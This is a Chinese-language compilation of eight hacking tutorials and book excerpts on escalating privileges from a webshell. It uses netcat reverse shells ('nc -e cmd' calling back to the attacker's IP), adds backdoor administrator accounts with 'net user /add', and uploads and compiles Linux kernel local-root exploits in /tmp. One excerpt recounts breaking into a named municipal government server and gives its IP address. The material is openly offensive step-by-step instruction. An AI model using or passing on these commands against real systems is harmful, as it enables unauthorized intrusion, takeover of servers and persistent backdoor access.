NC反弹CMDSHELL提权总结(整理8篇)由网友“小奶油”投稿提供,以下是小编为大家整理后的NC反弹CMDSHELL提权总结,欢迎阅读与收藏。
篇1:NC反弹CMDSHELL提权总结
Server-U等都不可以用的情况下. 一般都可思考用此方法
不过这种方法, 只要对方装了防火墙, 或是屏蔽掉了除常用的那几个端口外的所有端口… 那么这种方法也失效了….
1:通过shell将上传NC和CMD传到站点目录下(这里一定上传的注意权限,最好是可读写目录下)
web目录都是有写有读的权限,我们直接传NC进去
2:然后本地执行nc -vv -lp 52进行反弹
3:在shell命令下执行
F:\wwwroot\img\nc.exe -e cmd上传路径 IP(外网IP) 52(这里是本机端口)
4:在shell里执行命令后,马上看到本地CMS里已经反弹上去了,执行net user 也是成功.
5:直接添加用户,然后远程去连接!
看到添加成功,也设置为管理组了!接下来直接远程连接就OK!
不少人NC提权没有成功过,因为其中的原因是你没有降低权限,而导致了NC提权失败
失败总结:
1.反弹端口
网上不少文章写 反弹端口445 110 什么的,你当防火墙白痴是不是,我建议看一下端口有没有8080端口,如果没有8080端口的话,要反弹8080
端口,这样被防火墙阻止的概率较小
2.降低运行权限
1.现在本地监听一个端口
nc -vv -l -p 8080 //最好是80或8080这样的端口,被防火墙拦截的几率很小,
NC反弹CMDSHELL提权总结
,
2.在WebShell运行下面命令连接我们监听的端口得到CmdShell:
nc -vv IP 8080 -e C:\Documents and Settings\All Users\Documents\cmd.exe //假设cmd.exe是上传在“C:\Documents and Settings\All
Users\Documents\”这个目录
篇2:NC反弹CMD提权
By:Falling
上次拿的服务器很久没看了,
这几天忙与学习。
今天上去看下
帐号被删除。。我擦。
这个管理员真是让人 .
于是用用上次方法udf提权。
帐号还是没添加上。。
如图:
经过很多测试不成功。管理员但还是疏忽了ws组建。
呵呵。成功的希望正在前方。。
虽然对mysql语句不精通。
放弃了mysql提权方法。
后来在某个论坛看见cmd反弹shell
呵呵,
有戏了。
灵感来了。找了web目录上传nc和巴西烤肉
web目录都是有写有读的权限。
本机连接
nc -vv -lp 52
服务器连接比如:
D:\web\nc.exe -e cmd上传路径 IP(外网IP) 52(这里是本机端口)
如图:
反弹上去net user 成功了.
利用巴西烤肉来提权
命令:
1.exe user falling falling /add
就出现了密码不满足密码策略的要求。检查最小密码长度、密码复杂性和密码历
史的要求。
如图:
那就换个密码吧.
net user falling Falling1234 /add
果断的成功
如图:
篇3:Windows下NC反弹CMD提权
Server-U等都不可以用的情况下. 一般都可思考用此方法
不过这种方法, 只要对方装了防火墙, 或是屏蔽掉了除常用的那几个端口外的所有端口… 那么这种方法也失效了….
1:通过shell将上传NC和CMD传到站点目录下(这里一定上传的注意权限,最好是可读写目录下)
web目录都是有写有读的权限,我们直接传NC进去
2:然后本地执行nc -vv -lp 52进行反弹
3:在shell命令下执行
F:\wwwroot\img\nc.exe -e cmd上传路径 IP(外网IP) 52(这里是本机端口)
4:在shell里执行命令后,马上看到本地CMS里已经反弹上去了,执行net user 也是成功.
5:直接添加用户,然后远程去连接!
看到添加成功,也设置为管理组了!接下来直接远程连接就OK!
篇4:Linux下使用NC反弹本地简单的提权
很多时候拿到shell了,然后在菜道或Shell里执行简单命令不允许!说明权限很死或者被管理禁止了!这里我已NC将SHELL反弹回本地提权!
先看下linux内核
uanme -a
2.6.18-194.11.3.el5 内核 ,这个好CentOS release 5.5的系统!
找个外网IP 监听12666,当然12666也可以改,我这里用NC监听nc -l -n -v -p 12666
然后再点你shell
连接成功就出现下面的内容
然后百度找2.6.18-194这个内核的EXP,我已经收藏过.然后通过Webshell把EXP上传到/tmp目录下,为什么要传到这个目录呢?因为在Linux下一般tmp目录的权限是可写可执行!
然后我们进到/tmp目录
cd /tmp 进入到tmp目录了,看下我们之前上传的2.6.18-194
我这里有权限rwx,可读可写可执行.如果没有权限执行命令chmod -R 777 文件名
我这里的exp已编译过了,直接执行溢出就ok了 ./2.6.18-194 要是你的exp没有编译那么先执行gcc /tmp/文件名.c -o /tmp/文件名
命令先把他编译好,在执行./2.6.18-194运行EXP就OK了!
篇5:NC在提权过程中的使用
话说n天前拿到了一个webshell 、因为空间是美国的、我个人比较感兴趣哈、
因此就想办法看看能不能把权限给提升了、
故事就讲到这里、因为不是重点、
重点:使用NC得到系统cmdshell
工具:点击下载
步骤: 1、本地监听一个端口,
NC在提权过程中的使用
,
nc -vv -l -p 8080
最好是80或8080这样的端口,被防火墙拦截的几率小很多。
2、在WebShell运行下面命令连接我们监听的端口得到CmdShell:
nc -vv 步骤1监听的地址 8080 -e 上传的cmd.exe
By:Coody
篇6:虚拟主机提权简单总结
我们的分享和交流只是为了能让自己进步一点点,能带给基友们一点点帮助,可是在交流的过程中遇见了能提权的shell被人删除的情况,真想不通陌生的基友你为什么要这样自私呢,做个黑产拿几百个shell回去卖,你能富有吗?
第一:了解一些简单的虚拟主机识别
常见的虚拟主机识别:
星外虚拟主机主机D:\freehost\zhoudeyang\web\Prim@Hosting 一般很难找到可执行目录,可以测试用远程调用cmd,exp来提权
虚拟主机D:\hosting\wwwroot\ vhostroot
分支D:\Vhost\WebRoot\51dancecn\ vhostrootD:\vhostroot\localuser\
星外分支D:\vhostroot\LocalUser\gdrt\
新网虚拟主机D:\virtualhost\web580651\www\ 可以找到很多可执行目录,但是目前基本上大部分为windows 系统,提权有难度
华众虚拟主机E:\wwwroot\longzhihu\wwwroot\ 一般有安全模式
星外分支F:\host\wz8088\web\
万网虚拟主机F:\usr\fw04408\xpinfo\ 支持aspx的话应该能扫到可执行目录
其他的虚拟主机可以使用reg.aspx,getacl.aspx配合来识别
第二:是不是能找到可执行目录
主要asp.php和aspx的,我在这里主要介绍ASPX的:
Reg.aspx从注册表读取目录
Getacl.aspx遍历目录以及文件,获取当前用户可控制的目录或者文件
篇7:四川某市房管局网站服务器内部网络入侵纪实反弹Shell,Linux溢出提权。
摘要:《大中型网络入侵要案直击与防御》本章介绍的是开篇案例--四川某市房管局网站服务器内部网络入侵纪实,本节为大家介绍反弹Shell,Linux溢出提权。
21.2.6 反弹Shell,Linux溢出提权
mysql提权失败,转换入侵思路,可以考虑溢出提权,这也是在WebShell中常见的一种提权方式。不过在进行溢出提权时,用WebShell中的shell命令直接操作是无法获得提权后的CMD Shell的,因此必须先利用WebShell反弹到本地,建立一个CMD Shell窗口,在其中进行提权操作。
还是利用刚才的FTP账号上传一个PHP反弹shell工具,上传前修改设置其中的反弹IP地址为本机IP地址,端口为8888,上传后的链接地址为“www.**114.com/ zt/shell.php”。然后在本地打开命令提示符窗口,执行如下命令。
nc -l -vv -p 8888
使用nc监听本地的8888端口,
在浏览器中访问“www.**114.com/zt/shell.php”,在nc监听的端口中,就可以获得一个从网站服务器(125.70.244.104)上返回来的命令行Shell了(图21-26)。
获得一个Shell,就可以稳定地进行操作,不会出现像在WebShell中操作时超时或无法连接的情况。现在考虑进行溢出提权。
截止到入侵的当前时间7月为止,最新的Linux溢出提权漏洞有以下几个。
Linux Kernel 2.6.x UDEV Local Privilege Escalation ExploitLinux Kernel 2.6.x SCTP FWD Memory COrruption Remote ExploitLinux Kernel 2.6.x ptrace_attach Local Privilege Escalation Exploit
[1] [2] [3] 下一页
篇8:四川某市房管局网站服务器内部网络入侵纪实反弹Shell,Linux溢出提权。网站安全
摘要:《大中型网络入侵要案直击与防御》本章介绍的是开篇案例--四川某市房管局网站服务器内部网络入侵纪实,本节为大家介绍反弹Shell,Linux溢出提权。
21.2.6 反弹Shell,Linux溢出提权
mysql提权失败,转换入侵思路,可以考虑溢出提权,这也是在WebShell中常见的一种提权方式。不过在进行溢出提权时,用WebShell中的shell命令直接操作是无法获得提权后的CMD Shell的,因此必须先利用WebShell反弹到本地,建立一个CMD Shell窗口,在其中进行提权操作。
还是利用刚才的FTP账号上传一个PHP反弹shell工具,上传前修改设置其中的反弹IP地址为本机IP地址,端口为8888,上传后的链接地址为“www.**114.com/ zt/shell.php”。然后在本地打开命令提示符窗口,执行如下命令。
nc -l -vv -p 8888
使用nc监听本地的8888端口。在浏览器中访问“www.**114.com/zt/shell.php”,在nc监听的端口中,就可以获得一个从网站服务器(125.70.244.104)上返回来的命令行Shell了(图21-26)。
获得一个Shell,就可以稳定地进行操作,不会出现像在WebShell中操作时超时或无法连接的情况。现在考虑进行溢出提权。
截止到入侵的当前时间2009年7月为止,最新的Linux溢出提权漏洞有以下几个。
Linux Kernel 2.6.x UDEV Local Privilege Escalation ExploitLinux Kernel 2.6.x SCTP FWD Memory COrruption Remote ExploitLinux Kernel 2.6.x ptrace_attach Local Privilege Escalation Exploit
其中第二个漏洞要求目标系统上至少运行了一个SCTP协议的程序,
SCTP不是一个常用的协议,但在电信网络骨干里会经常见到它,多个Linux发行版默认也不启用SCTP支持,多是以LKM的形式存在的。要利用这个漏洞就必须满足两个条件:系统默认支持SCTP或者加载sctp LKM,系统有一个SCTP用户空间程序监听某个sctp端口。而通过查看端口发现,目标系统中未运行SCTP协议,因此无法利用其进行攻击。只有考虑利用UDEV和ptrace_attach本地提权漏洞攻击。
先尝试最新的Linux Kernel 2.6.x ptrace_attach Local Privilege Escalation Exploit漏洞,这个溢出漏洞利用程序有两个版本,一个是s0m3b0dy,另一个是prdelka版本,两个都是用C语言写的。先将s0m3b0dy版代码文件“s0m3b0dy.c”通过FTP上传,或者直接在返回的Shell窗口中用Wget命令下载到目标主机上。然后在Shell中执行如下命令进行编译。
gcc -o s0m3b0dy s0m3b0dy.c
编译成功生成溢出程序,执行如下命令。
./linux
执行编译程序进行溢出,但是在溢出时提示“Damn no r00t here:(”,看来溢出失败,提权不成功(图21-27)。
图21-26 监听本地端口图21-27 溢出失败再传prdelka版溢出代码“prdelka.c”并进行编译,在编译时出现错误,执行编译程序后无任何反应。
再尝试用Linux Kernel 2.6.x UDEV Local Privilege Escalation Exploit进行溢出提权攻击,也未提权成功。
【NC反弹CMDSHELL提权总结(整理8篇)】相关文章:
浅析进程“伪隐藏”技术与实现两则2022-09-10
如何入侵XP(xp入侵教程)2024-03-04
售前工程师求职简历表格2024-04-21
Oracle SQL Injection Cheat Sheet脚本安全2023-02-16
让脚本躲过杀毒软件脚本安全2023-08-31
NFS服务器安全的解析和解决2024-04-10
Discuz XSS得webshell脚本安全2022-05-08
一次意外突破安全狗拿Shell2023-03-26
如何防范网站数据库入侵2022-11-30
Echo 写入VBS提权2022-07-19